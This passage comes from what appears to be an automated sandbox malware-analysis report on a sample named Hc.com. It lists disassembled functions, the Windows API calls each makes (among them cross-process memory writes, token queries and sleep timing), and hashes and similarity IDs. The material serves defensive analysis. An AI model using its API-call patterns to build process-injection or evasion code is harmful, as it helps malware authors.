                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  • Opcode ID: 67b826ccd27e33ea8265eeff1aea0f731412d2844deec25373097f9209ccdc20
                                                                  • Instruction ID: 34d1d544f259ab48ef765f92e08c4d7b39957b1219b3aaf5a4a984d764731f8b
                                                                  • Opcode Fuzzy Hash: 67b826ccd27e33ea8265eeff1aea0f731412d2844deec25373097f9209ccdc20
                                                                  • Instruction Fuzzy Hash: A101DFB6600204AFEB505F54DC04B9A7AAEEF44752F101624F905E6212F770CD808BA0
                                                                  Function 0068F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0068F2AE
                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 0068F2BC
                                                                  • Sleep.KERNEL32(00000000), ref: 0068F2C4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0068F2CE
                                                                  • Sleep.KERNEL32 ref: 0068F30A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 08de2df7f568a046aaa1dd708fec8fb2aaae28ec9298cbdedfc61fe59848b383
                                                                  • Instruction ID: a39a352ced5201a88306b2d42fb6b2a0d7da63072d3a3a79719fcd3c6978413b
                                                                  • Opcode Fuzzy Hash: 08de2df7f568a046aaa1dd708fec8fb2aaae28ec9298cbdedfc61fe59848b383
                                                                  • Instruction Fuzzy Hash: DD0140B5D01519DBCF00AFF8DC59AEDBB7AFB08711F011666E501B2290DB709694C7A1
                                                                  Function 00681A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00681A60
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A6C
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A7B
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A82
                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00681A99
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: 6753bc8a2c502fe10ecb5590b08523ab39fc929eac0900c1bbbf88b75e43b6c9
                                                                  • Instruction ID: c875ec54ce2739a93dbbcef2c58d8c14881b2e432edd940d147e235317ee47d7
                                                                  • Opcode Fuzzy Hash: 6753bc8a2c502fe10ecb5590b08523ab39fc929eac0900c1bbbf88b75e43b6c9
                                                                  • Instruction Fuzzy Hash: 890181F9601205BFDB155F64DC48DAA3B6FEF85364B210524F845DB360EA31DC818A60
                                                                  Function 00681960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00681976
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00681982
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00681991
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00681998
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006819AE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 4aca4c14898886cca2770960b91f9c76d77f97cd74595766b664e2b72f9b0dfb
                                                                  • Instruction ID: a2ac2c2d8d8d8aacca5887f0b5c0461732f6709949a3ad92ee8c01995977baef
                                                                  • Opcode Fuzzy Hash: 4aca4c14898886cca2770960b91f9c76d77f97cd74595766b664e2b72f9b0dfb
                                                                  • Instruction Fuzzy Hash: 2EF062B5100311BBDB215F68EC59F9A3BAEEF8A7A0F110614F945DB250DA70D8818B60
                                                                  Function 00681900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00681916
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00681922
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00681931
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00681938
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0068194E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 86a5395056e75692b43815376bf9472671a3f509de961b6fd63dde8af8d14bd4
                                                                  • Instruction ID: bf89caa5e4d52f271259b7189295b5e3f18c3fe17176ed6a21cb98288bf322bb
                                                                  • Opcode Fuzzy Hash: 86a5395056e75692b43815376bf9472671a3f509de961b6fd63dde8af8d14bd4
                                                                  • Instruction Fuzzy Hash: FDF062B5100302BBDB211F69EC4DF9A3BAEEF8A7A1F110514FA45DB250DA70DC818B60
                                                                  Function 00690CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CCB
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CD8
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CE5
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CF2
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CFF
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690D0C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 6efe42cd411451b69270b25fa6898b22e01b69043aa342904cbffd5e56f78809
                                                                  • Instruction ID: baf8bff42796ade0c81d5aedea4327680688a790daf10e055793bc28205e8e54
                                                                  • Opcode Fuzzy Hash: 6efe42cd411451b69270b25fa6898b22e01b69043aa342904cbffd5e56f78809
                                                                  • Instruction Fuzzy Hash: 71019C71800B15DFDB30AFA6D980856FAFABE502153158A3FD19652A21C7B0A988DE80
                                                                  Function 006865AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 006865BF
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 006865D6
                                                                  • MessageBeep.USER32(00000000), ref: 006865EE
                                                                  • KillTimer.USER32(?,0000040A), ref: 0068660A
                                                                  • EndDialog.USER32(?,00000001), ref: 00686624
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 31afc1f33516816ec6deeb7f094a0eb427389ce3c7dd746748c1e3e5ed279ad3
                                                                  • Instruction ID: ef013c4106b450dd2f389553f3b949056eea736e0764179cd007d34d8ffe94cc
                                                                  • Opcode Fuzzy Hash: 31afc1f33516816ec6deeb7f094a0eb427389ce3c7dd746748c1e3e5ed279ad3
                                                                  • Instruction Fuzzy Hash: 4D018170500714ABEB206F20DD4EFD67BBAFB04705F001769B586A50E1FBF0AAC48B95
                                                                  Function 0065DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0065DAD2
                                                                    • Part of subcall function 00652D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4), ref: 00652D4E
                                                                    • Part of subcall function 00652D38: GetLastError.KERNEL32(006F1DC4,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4,006F1DC4), ref: 00652D60
                                                                  • _free.LIBCMT ref: 0065DAE4
                                                                  • _free.LIBCMT ref: 0065DAF6
                                                                  • _free.LIBCMT ref: 0065DB08
                                                                  • _free.LIBCMT ref: 0065DB1A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: e44db139c16badf715e6c4becfe5326c77feb51835b132985ed37af192bea6b4
                                                                  • Instruction ID: 5c22ffd827fc97bf1d7eb35faade1b5e4c349618626240231f4978a3ed32abc5
                                                                  • Opcode Fuzzy Hash: e44db139c16badf715e6c4becfe5326c77feb51835b132985ed37af192bea6b4
                                                                  • Instruction Fuzzy Hash: 18F03C72504309AB8760EB58E9D1C5B73EFBE14312BA51809F809DB641CA30FC848654
                                                                  Function 00652610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0065262E
                                                                    • Part of subcall function 00652D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4), ref: 00652D4E
                                                                    • Part of subcall function 00652D38: GetLastError.KERNEL32(006F1DC4,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4,006F1DC4), ref: 00652D60
                                                                  • _free.LIBCMT ref: 00652640
                                                                  • _free.LIBCMT ref: 00652653
                                                                  • _free.LIBCMT ref: 00652664
                                                                  • _free.LIBCMT ref: 00652675
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 5e5693bbcc816fd6d6a2442e9cad035da28fb3aab22949255944262ef4e8b755
                                                                  • Instruction ID: cf4b5bd5dcd0ccf52c910fda1808052a24162be065a8931bd934c7ec0df7899e
                                                                  • Opcode Fuzzy Hash: 5e5693bbcc816fd6d6a2442e9cad035da28fb3aab22949255944262ef4e8b755
                                                                  • Instruction Fuzzy Hash: 05F0D0745026129B8B41AF64EC618693BA7BF36792705260AF8149B275C7310A05EF88
                                                                  Function 006512B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$_free
                                                                  • String ID: a/p$am/pm
                                                                  • API String ID: 3432400110-3206640213
                                                                  • Opcode ID: b0ab862866e7a4711db69535e5db0678799398944dfdc27de169506d72896f25
                                                                  • Instruction ID: 0a6f68cf401f3bdefe0cebec53fae7f4940c022fcaaf83472fb774747ae287cf
                                                                  • Opcode Fuzzy Hash: b0ab862866e7a4711db69535e5db0678799398944dfdc27de169506d72896f25
                                                                  • Instruction Fuzzy Hash: FFD1E1759002069ACB249F68C855BFAB7B3FF07702F28425AED029F350E3759D89CB90
                                                                  Function 006A5231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006941FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694229
                                                                    • Part of subcall function 006941FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694239
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 006A5419
                                                                  • VariantInit.OLEAUT32(?), ref: 006A550E
                                                                  • VariantClear.OLEAUT32(?), ref: 006A55CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                  • String ID: bnh
                                                                  • API String ID: 2854431205-201681183
                                                                  • Opcode ID: a039c18d654ac93057b6e366164f31bb33b68bd30e719d962207820742ba8da5
                                                                  • Instruction ID: f441b13edd82b638b19af5a1b73632dafce26c5f63563a35aa96fb2ee22e9496
                                                                  • Opcode Fuzzy Hash: a039c18d654ac93057b6e366164f31bb33b68bd30e719d962207820742ba8da5
                                                                  • Instruction Fuzzy Hash: 1BD15C70900609AFCB44EF94D490AEDBBB6FF48304F54812DE406AB292DB31AE86CF50
                                                                  Function 0062CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0062D253
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: t5o$t5o$t5o
                                                                  • API String ID: 1385522511-19283736
                                                                  • Opcode ID: e25c0273002b80331f26eabe83b145daada0c4b2349284d65cc8911198f95bf3
                                                                  • Instruction ID: e55436905051a5d54d218b9e9e0bd5a513cbb798550223ed9e6151069a8c5345
                                                                  • Opcode Fuzzy Hash: e25c0273002b80331f26eabe83b145daada0c4b2349284d65cc8911198f95bf3
                                                                  • Instruction Fuzzy Hash: 8F915BB5A00626DFCB14CF58E4946AABBF2FF58314F24815ED945AB350D731EA82CF90
                                                                  Function 006A61A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper_wcslen
                                                                  • String ID: CALLARGARRAY$bnh
                                                                  • API String ID: 157775604-1689748369
                                                                  • Opcode ID: 698a06cb41a7e220b7b41e49e7b077e755909793428b8e107e80817ee3cc800b
                                                                  • Instruction ID: 1b6e7628c50b6c9123469e023767a64626a7a617a737d9ebc4a47beb08aa4317
                                                                  • Opcode Fuzzy Hash: 698a06cb41a7e220b7b41e49e7b077e755909793428b8e107e80817ee3cc800b
                                                                  • Instruction Fuzzy Hash: 2F418D71A00215DFCB04EFA8C881AEEBBB6EF59324F144129F405AB251E7709E81CF90
                                                                  Function 00683063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0068BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00682B1D,?,?,00000034,00000800,?,00000034), ref: 0068BDF4
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006830AD
                                                                    • Part of subcall function 0068BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00682B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0068BDBF
                                                                    • Part of subcall function 0068BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0068BD1C
                                                                    • Part of subcall function 0068BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00682AE1,00000034,?,?,00001004,00000000,00000000), ref: 0068BD2C
                                                                    • Part of subcall function 0068BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00682AE1,00000034,?,?,00001004,00000000,00000000), ref: 0068BD42
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0068311A
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00683167
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: d2a330193fe3f4098c464fbe2a66b29155b98599df5b5c4d9c04c54f97abba28
                                                                  • Instruction ID: 5c532c0bee96a45da075ddbb030585c62c775fde6da688e7c51c405c6ec79e57
                                                                  • Opcode Fuzzy Hash: d2a330193fe3f4098c464fbe2a66b29155b98599df5b5c4d9c04c54f97abba28
                                                                  • Instruction Fuzzy Hash: 30412C72900228BFDB10EBA4CD95ADEBBB9EF45700F004199FA45B7280DB706F85CB60
                                                                  Function 00651A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\280366\Hc.com,00000104), ref: 00651AD9
                                                                  • _free.LIBCMT ref: 00651BA4
                                                                  • _free.LIBCMT ref: 00651BAE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\280366\Hc.com
